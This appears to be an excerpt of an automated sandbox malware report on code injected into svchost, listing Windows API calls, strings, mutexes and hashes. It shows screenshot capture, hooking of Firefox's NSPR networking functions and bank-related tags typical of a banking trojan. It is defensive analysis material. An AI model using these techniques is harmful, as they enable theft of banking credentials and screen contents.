                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$EventFileMutexObjectSingleWait$HeapThreadmemset$AllocCheckConnectionDesktopInternetMappingViewlstrcpyn$AdminAliveCacheCountCurrentFlushNetworkReleaseResolverSleepTickUserVersionlstrcpymalloc
                                                                                                                                                                                                            • String ID: user!965543!09C06683$P0Wu$fuck
                                                                                                                                                                                                            • API String ID: 2939156510-1716464960
                                                                                                                                                                                                            • Opcode ID: 2d7c50fa93b956e0672c43a51721cda743f6e35ab882156119189896743e9e10
                                                                                                                                                                                                            • Instruction ID: 8bb9a241b0db1dacf2ee8b41bc80e65b0e64538a45a66047102142ce9d1b3c7c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d7c50fa93b956e0672c43a51721cda743f6e35ab882156119189896743e9e10
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C51B0B19802449FDB11DF64D84CFA67BE9FB88314F158BBAE9584B291C730E518CF60
                                                                                                                                                                                                            Function 02C87230 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 149fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$fwrite$fseek$fclosefread
                                                                                                                                                                                                            • String ID: 6d1da759
                                                                                                                                                                                                            • API String ID: 2434908339-2775040301
                                                                                                                                                                                                            • Opcode ID: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
                                                                                                                                                                                                            • Instruction ID: 1e974ff73977e1a7b5a8d9bb28150bf6261c6c699c825a5e133cf8dde1618f11
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c40e4bed5cf97454075a45736d22c2bd94892342a3efaa6722b600237556d0fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8341F671A406449FD720EBA8CC85B6AF3E8EF98314F248A2DE985C37D1D278F4458B61
                                                                                                                                                                                                            Function 02C909A0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C909CA
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A0C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90A18
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C90A1C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A2D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C90A34
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A63
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90A69
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C90A6D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A7E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C90A85
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C90ABA
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C90AD0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da7aa$scrs
                                                                                                                                                                                                            • API String ID: 224938940-351550332
                                                                                                                                                                                                            • Opcode ID: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
                                                                                                                                                                                                            • Instruction ID: 9adedc9061a233322b623d4569dee6cd3ded6863e4bc389879186b729274d846
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A310571E402985BDB219B749C5CBEBBBA8EF95300F4546D4EA89D3100DF70DA55CBA0
                                                                                                                                                                                                            Function 02C8A150 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C8A17A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A1BC
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8A1C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8A1CC
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A1DD
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8A1E4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A213
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8A219
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8A21D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A22E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8A235
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8A26A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C8A280
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da3b2$scrs
                                                                                                                                                                                                            • API String ID: 224938940-726422850
                                                                                                                                                                                                            • Opcode ID: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                            • Instruction ID: 81399e7e759840fcf260adc1e0ba70d5316192ef898cd4b424ea9abbfecd5d93
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70315871E002989BCB21EB349C98BEB7BA8EF85304F0486D5E989C3100DF30DA54CBA0
                                                                                                                                                                                                            Function 02C91960 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C9198A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C919CC
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C919D8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C919DC
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C919ED
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C919F4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91A23
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91A29
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C91A2D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C91A3E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C91A45
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C91A7A
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C91A90
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da6b7$scrs
                                                                                                                                                                                                            • API String ID: 224938940-862046869
                                                                                                                                                                                                            • Opcode ID: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                            • Instruction ID: 97337809144342f5afb747c78701df50d7f1a3d8e6f0a197024a797b0774a99a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34313571E402995FCB21DB34AC5DBEB7BA8AF85300F0946D4E989C3100DFB0DA58CBA0
                                                                                                                                                                                                            Function 02C8E6E0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E70A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E74C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E758
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E75C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E76D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E774
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E7A3
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E7A9
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E7AD
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E7BE
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E7C5
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8E7FA
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C8E810
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da208$scrs
                                                                                                                                                                                                            • API String ID: 224938940-4063727140
                                                                                                                                                                                                            • Opcode ID: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                            • Instruction ID: c012ed745ce7834b89328ee85ffa25eefdb54afe5cdcc30dafb8a318effbca9e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4314871D402985BC721EB349C58BEB77A8AF85704F0589D4FA85C3101DF70DA54CBA4
                                                                                                                                                                                                            Function 02C91690 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C916BA
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C916FC
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91708
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C9170C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9171D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C91724
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91753
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C91759
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C9175D
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9176E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C91775
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C917AA
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C917C0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6D1DA718$scrs
                                                                                                                                                                                                            • API String ID: 224938940-3376271743
                                                                                                                                                                                                            • Opcode ID: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                            • Instruction ID: d0669bbe0d88d5412a30cdd21ac2ea9879cccbf1a7e9ba89ea04bb6e565d3bca
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3310771D4029A5BCB119B749C5DBEB77E8EF85700F4846D4EA89C3100DF71DA55CBA0
                                                                                                                                                                                                            Function 02C90AF0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da7aa), ref: 02C90BA7
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da7aa,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da7aa$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RAIFF
                                                                                                                                                                                                            • API String ID: 505831200-2981933777
                                                                                                                                                                                                            • Opcode ID: 359c752f12f6c967435cf34ed389b4ebcc13ba95406090ce099f1244c96a91b4
                                                                                                                                                                                                            • Instruction ID: e6b70bb27d61c34d8a9be23afc102e9d7ab718ba819a6fa34f7ce02b850e8a58
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 359c752f12f6c967435cf34ed389b4ebcc13ba95406090ce099f1244c96a91b4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE11B630AC9755BAF7126B658C1EF1E37DC5F44B19F104654F551A30C1EBF0E9008AAA
                                                                                                                                                                                                            Function 02C91AB0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da6b7), ref: 02C91B67
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da6b7,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6d1da6b7$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Wu$RSTYLE
                                                                                                                                                                                                            • API String ID: 505831200-1961891315
                                                                                                                                                                                                            • Opcode ID: e7272ec0258fa3e64e587906a230ea33347638888357daea2d824eb37b8710e6
                                                                                                                                                                                                            • Instruction ID: b08893210dbc9ebcc0b73e871e23fbd590f2a43a74c877046b024da61a8c4ed2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7272ec0258fa3e64e587906a230ea33347638888357daea2d824eb37b8710e6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C11E630AC47537BF6126B658C0FF1A369C9F81B64F184654F919620C1EBF4A9008A7B
                                                                                                                                                                                                            Function 02C7EEB0 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(nspr4.dll,00000000,00000000,00000000,02C84822), ref: 02C7EEBA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 02C7EED7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 02C7EEF3
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 02C7EF0F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 02C7EF2B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 02C7EF47
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 02C7EF54
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 02C7EF61
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                              • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$Virtual$Protect$AllocLibraryLoadmemcpy
                                                                                                                                                                                                            • String ID: PR_Close$PR_GetError$PR_GetNameForIdentity$PR_OpenTCPSocket$PR_Read$PR_SetError$PR_Write$nspr4.dll
                                                                                                                                                                                                            • API String ID: 1577031324-943613760
                                                                                                                                                                                                            • Opcode ID: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                            • Instruction ID: 6d5524f4b433b16b8db29e1f5193a618bd92d53aeb5a8604d07816fc66f55455
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4b46da6d58aa288dc49034314960b9be425a9911dad82519c8391f5165aef91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5017973BC536632B91336751C46FCB574D8EC1E48F0649B1F803B1944DBD5E1028879
                                                                                                                                                                                                            Function 02C83EA0 Relevance: 27.1, APIs: 18, Instructions: 133memorynetworkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,75573050,755730D0,75573080), ref: 02C83EC7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C83ECA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83EDE
                                                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 02C83F05
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F23
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F2D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83F30
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83F3D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83F40
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02C83F58
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C83F5F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83F6F
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02C83F85
                                                                                                                                                                                                            • htons.WS2_32(00000000), ref: 02C83FB1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FE1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83FE4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02C83FF4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83FF7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1718479325-0
                                                                                                                                                                                                            • Opcode ID: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                            • Instruction ID: b88085a35273208d51dc973e77e834283b74a67b41c9b3ff78c4246472cfc672
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29477025ae6a1fe9aa3d15dd92cb163b7405cb1b7ee00adbba94e1da104d29ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0241E332E40294ABDB21AF65DC48F9A7B78EF80B09F0185D4FD0497280DB72DA45CBE1
